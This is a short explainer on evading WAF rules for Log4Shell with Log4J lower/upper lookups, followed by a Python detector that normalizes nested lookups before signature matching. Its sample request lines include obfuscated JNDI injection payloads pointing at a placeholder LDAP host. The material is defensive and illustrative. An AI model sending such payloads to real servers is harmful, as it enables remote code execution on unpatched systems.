This bypass technique targets Web Application Firewalls (WAFs) that attempt to block Log4Shell attacks by filtering payloads. Many organizations deploy WAF rules to detect and drop suspicious payloads that could lead to Remote Code Execution (RCE). However, attackers can leverage Log4J's built-in string manipulation lookups to obfuscate payloads and bypass these signature-based rules: the payload is encoded or transformed so that the WAF no longer recognizes it as malicious, yet Log4J still evaluates it at log time. The technique exploits the dynamic evaluation of Log4J lookups, so a filter that only matches the raw request string sees nothing suspicious. It shows why WAF rules need to normalize nested lookups before matching, and why filtering is a stopgap rather than a substitute for patching or removing the vulnerable lookup class.
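The detection-side consequence of this, as an added example (not from the original tweet): a raw-string rule for `${jndi:` misses a request whose lookup name is assembled from `lower:`/`upper:` lookups, while the same rule applied after resolving those lookups inside-out catches it. The sample request lines and the `placeholder.invalid` host are constructed for the example.

```python
import re

# Innermost ${...} lookup: a body with no further "$", "{" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The signature a naive WAF rule looks for in the raw request.
JNDI_RULE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(match):
    """Evaluate a single lower:/upper: lookup; leave any other lookup untouched."""
    name, has_arg, arg = match.group(1).partition(":")
    if has_arg and name.strip().lower() == "lower":
        return arg.lower()
    if has_arg and name.strip().lower() == "upper":
        return arg.upper()
    return match.group(0)


def resolve_case_lookups(text, max_rounds=16):
    """Resolve nested lower/upper lookups from the inside out until the text stops changing."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_one, text)
        if resolved == text:
            break
        text = resolved
    return text


def naive_match(text):
    """Rule applied to the raw request string, as a signature-only WAF would."""
    return bool(JNDI_RULE.search(text))


def normalized_match(text):
    """Same rule applied after lookup normalization."""
    return bool(JNDI_RULE.search(resolve_case_lookups(text)))


# Constructed sample request lines (hypothetical; placeholder.invalid is not a real host).
SAMPLE_LINES = [
    'GET /index.html "Mozilla/5.0"',
    'GET / "${jndi:ldap://placeholder.invalid/x}"',
    'GET / "${${lower:j}${upper:n}di:ldap://placeholder.invalid/x}"',
    'GET / "${${lower:${upper:j}}ndi:ldap://placeholder.invalid/x}"',
]


def scan(lines):
    """Return (line, naive_hit, normalized_hit) so the two rule variants can be compared."""
    return [(line, naive_match(line), normalized_match(line)) for line in lines]


if __name__ == "__main__":
    for line, naive, normalized in scan(SAMPLE_LINES):
        print(f"naive={naive!s:5} normalized={normalized!s:5} {line}")
```

The normalizer only resolves the two case lookups the tweet refers to; a production rule has to account for every lookup type Log4J evaluates, which is why upgrading Log4J or removing the JNDI lookup remains the actual fix.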
Original tweet: https://twitter.com/intigriti/status/1953744273653866538